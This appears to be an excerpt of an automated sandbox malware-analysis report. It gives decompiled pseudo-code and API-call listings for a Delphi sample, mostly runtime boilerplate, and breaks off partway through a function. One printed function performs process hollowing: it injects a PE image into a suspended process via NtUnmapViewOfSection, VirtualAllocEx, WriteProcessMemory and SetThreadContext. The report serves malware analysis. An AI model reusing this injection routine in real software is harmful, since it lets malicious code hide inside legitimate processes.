    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D1C() {
    				struct HINSTANCE__* _t24;
    				void* _t32;
    				intOrPtr _t35;
    				void* _t45;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L3:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t32);
    						 *0x419004 = 0;
    					}
    					L5:
    					while(1) {
    						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    							 *0x0045463C = 0;
    						}
    						E00403AB8();
    						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    							_t14 =  *0x00454640;
    							if( *0x00454640 != 0) {
    								E0040532C(_t14);
    								_t35 =  *((intOrPtr*)(0x454640));
    								_t7 = _t35 + 0x10; // 0x400000
    								_t24 =  *_t7;
    								_t8 = _t35 + 4; // 0x400000
    								if(_t24 !=  *_t8 && _t24 != 0) {
    									FreeLibrary(_t24);
    								}
    							}
    						}
    						E00403A90();
    						if( *((char*)(0x454658)) == 1) {
    							 *0x00454654();
    						}
    						if( *((char*)(0x454658)) != 0) {
    							E00403C60();
    						}
    						if( *0x454630 == 0) {
    							if( *0x454024 != 0) {
    								 *0x454024();
    							}
    							ExitProcess( *0x419000); // executed
    						}
    						memcpy(0x454630,  *0x454630, 0xb << 2);
    						_t45 = _t45 + 0xc;
    						0x419000 = 0x419000;
    					}
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L3;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D14() {
    				intOrPtr* _t13;
    				struct HINSTANCE__* _t27;
    				void* _t36;
    				intOrPtr _t39;
    				void* _t52;
    
    				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L5:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t36);
    						 *0x419004 = 0;
    					}
    					L7:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t17 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t17);
    							_t39 =  *((intOrPtr*)(0x454640));
    							_t7 = _t39 + 0x10; // 0x400000
    							_t27 =  *_t7;
    							_t8 = _t39 + 4; // 0x400000
    							if(_t27 !=  *_t8 && _t27 != 0) {
    								FreeLibrary(_t27);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t52 = _t52 + 0xc;
    					0x419000 = 0x419000;
    					goto L7;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L5;
    				}
    			}









    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D18() {
    				struct HINSTANCE__* _t26;
    				void* _t35;
    				intOrPtr _t38;
    				void* _t51;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L4:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t35);
    						 *0x419004 = 0;
    					}
    					L6:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t16 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t16);
    							_t38 =  *((intOrPtr*)(0x454640));
    							_t7 = _t38 + 0x10; // 0x400000
    							_t26 =  *_t7;
    							_t8 = _t38 + 4; // 0x400000
    							if(_t26 !=  *_t8 && _t26 != 0) {
    								FreeLibrary(_t26);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t51 = _t51 + 0xc;
    					0x419000 = 0x419000;
    					goto L6;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L4;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
    				char _v1032;
    				int _t13;
    				void* _t22;
    
    				_t21 = __edx;
    				if(__eax != 0) {
    					if( *(__eax + 4) >= 0x10000) {
    						return E00404080(__edx,  *(__eax + 4));
    					}
    					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
    					return E00403F78(_t21, _t13, _t22);
    				}
    				return __eax;
    			}







    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
    				char _v272;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
    					_t14 = E00404FC0(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
    					}
    				}
    				return  *((intOrPtr*)(_t16 + 0x10));
    			}









    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
    				void* _t3;
    				void* _t6;
    
    				if(__eax <= 0) {
    					_t6 = 0;
    				} else {
    					_t3 =  *0x41903c(); // executed
    					_t6 = _t3;
    					if(_t6 == 0) {
    						E00402778(1);
    					}
    				}
    				return _t6;
    			}





    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
    				void* _t6;
    				intOrPtr _t7;
    
    				_t7 = __edx;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454638 = __eax;
    				 *0x45463c = 0;
    				 *0x454640 = __edx;
    				_t1 = _t7 + 4; // 0x400000
    				 *0x45402c =  *_t1;
    				E00403A70();
    				 *0x454034 = 0; // executed
    				_t6 = E00403B18(); // executed
    				return _t6;
    			}






    Non-executed Functions

    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
    				intOrPtr _v8;
    				char _v12;
    				CONTEXT* _v16;
    				void* _v20;
    				void _v24;
    				void _v28;
    				long _v32;
    				struct _PROCESS_INFORMATION _v48;
    				struct _STARTUPINFOA _v116;
    				CHAR* _t95;
    				short* _t171;
    				intOrPtr _t182;
    				intOrPtr _t189;
    				intOrPtr* _t194;
    				short* _t196;
    				void* _t197;
    				void* _t199;
    				void* _t200;
    				intOrPtr _t201;
    				void* _t215;
    
    				_t215 = __fp0;
    				_t199 = _t200;
    				_t201 = _t200 + 0xffffff90;
    				_t196 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t199);
    				_push(0x418218);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t201;
    				if(_v12 != 0) {
    					_push(0x418230);
    					_push(_v8);
    					_push(0x41823c);
    					_push(_v12);
    					E00404208();
    				}
    				 *_a4 = 0;
    				_t171 = _t196;
    				if( *_t171 == 0x5a4d) {
    					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
    					if( *_t194 == 0x4550) {
    						E00402B60( &_v116, 0x44);
    						E00402B60( &_v48, 0x10);
    						_v116.cb = 0x44;
    						_v116.dwFlags = 1;
    						_v116.wShowWindow = 0;
    						_t95 = E00404348(_v12);
    						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
    							 *_a4 = _v48.dwProcessId;
    							_v16 = E00417F28( &_v20);
    							if(_v16 != 0) {
    								_v16->ContextFlags = 0x10007;
    								if(GetThreadContext(_v48.hThread, _v16) != 0) {
    									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
    									if( *(_t194 + 0x34) != _v24) {
    										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    									} else {
    										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
    											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
    										} else {
    											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    										}
    									}
    									_t210 = _v28;
    									if(_v28 != 0) {
    										_t197 = E00417EA4(_t196, _t210);
    										_t125 = _v28;
    										if( *(_t194 + 0x34) != _v28) {
    											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
    											 *(_t194 + 0x34) = _v28;
    											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
    										}
    										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
    										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
    										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
    										SetThreadContext(_v48.hThread, _v16);
    										ResumeThread(_v48.hThread);
    										WaitForSingleObject(_v48.hThread, 0xffffffff);
    										_push(_t199);
    										_push(0x4181d0);
    										_push( *[fs:eax]);
    										 *[fs:eax] = _t201;
    										TerminateThread(_v48.hProcess, 0);
    										CloseHandle(_v48.hProcess);
    										_pop(_t189);
    										 *[fs:eax] = _t189;
    									}
    								}
    								VirtualFree(_v20, 0, 0x8000);
    							}
    							if( *_a4 == 0) {
    								TerminateProcess(_v48, 0);
    							}
    						}
    					}
    				}
    				_pop(_t182);
    				 *[fs:eax] = _t182;
    				_push(E0041821F);
    				return E00403EAC( &_v12, 2);
    			}
























    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				struct _WIN32_FIND_DATAA _v334;
    				char _v595;
    				void* _t45;
    				char* _t54;
    				char* _t64;
    				void* _t83;
    				intOrPtr* _t84;
    				char* _t90;
    				struct HINSTANCE__* _t91;
    				char* _t93;
    				void* _t94;
    				char* _t95;
    				void* _t96;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = _v8;
    				_t91 = GetModuleHandleA("kernel32.dll");
    				if(_t91 == 0) {
    					L4:
    					if( *_v8 != 0x5c) {
    						_t93 = _v8 + 2;
    						goto L10;
    					} else {
    						if( *((char*)(_v8 + 1)) == 0x5c) {
    							_t95 = E00404DF4(_v8 + 2);
    							if( *_t95 != 0) {
    								_t14 = _t95 + 1; // 0x1
    								_t93 = E00404DF4(_t14);
    								if( *_t93 != 0) {
    									L10:
    									_t83 = _t93 - _v8;
    									_push(_t83 + 1);
    									_push(_v8);
    									_push( &_v595);
    									L00401248();
    									while( *_t93 != 0) {
    										_t90 = E00404DF4(_t93 + 1);
    										_t45 = _t90 - _t93;
    										if(_t45 + _t83 + 1 <= 0x105) {
    											_push(_t45 + 1);
    											_push(_t93);
    											_push( &(( &_v595)[_t83]));
    											L00401248();
    											_t94 = FindFirstFileA( &_v595,  &_v334);
    											if(_t94 != 0xffffffff) {
    												FindClose(_t94);
    												_t54 =  &(_v334.cFileName);
    												_push(_t54);
    												L00401250();
    												if(_t54 + _t83 + 1 + 1 <= 0x105) {
    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
    													_push(0x105 - _t83 - 1);
    													_push( &(_v334.cFileName));
    													_push( &(( &(( &_v595)[_t83]))[1]));
    													L00401248();
    													_t64 =  &(_v334.cFileName);
    													_push(_t64);
    													L00401250();
    													_t83 = _t83 + _t64 + 1;
    													_t93 = _t90;
    													continue;
    												}
    											}
    										}
    										goto L17;
    									}
    									_push(_v12);
    									_push( &_v595);
    									_push(_v8);
    									L00401248();
    								}
    							}
    						}
    					}
    				} else {
    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
    					if(_t84 == 0) {
    						goto L4;
    					} else {
    						_push(0x105);
    						_push( &_v595);
    						_push(_v8);
    						if( *_t84() == 0) {
    							goto L4;
    						} else {
    							_push(_v12);
    							_push( &_v595);
    							_push(_v8);
    							L00401248();
    						}
    					}
    				}
    				L17:
    				return _v16;
    			}




















    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
    				char _v11;
    				char _v16;
    				intOrPtr _t28;
    				void* _t31;
    				void* _t33;
    
    				_t33 = __eflags;
    				_v16 = 0;
    				_push(_t31);
    				_push(0x40b318);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t31 + 0xfffffff4;
    				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
    				E004040F8( &_v16, 7,  &_v11);
    				_push(_v16);
    				E00407174(7, GetACP(), _t33);
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E0040B31F);
    				return E00403E88( &_v16);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
    				char _v260;
    				intOrPtr _t10;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t10 = _a4;
    				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
    					return E00403EDC(_t10, _t18);
    				}
    				return E00403F78(_t10, _t5 - 1,  &_v260);
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
    				char _v16;
    				char _t5;
    				char _t6;
    
    				_push(__ecx);
    				_t6 = __ecx;
    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
    					_t5 = _t6;
    				} else {
    					_t5 = _v16;
    				}
    				return _t5;
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    C-Code - Quality: 100%
    			E00417A70() {
    
    				if( *0x454a18 == 0) {
    					 *0x454a18 = GetModuleHandleA("kernel32.dll");
    					if( *0x454a18 != 0) {
    						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
    						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
    						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
    						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
    						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
    						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
    						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
    						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
    						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
    						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
    						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
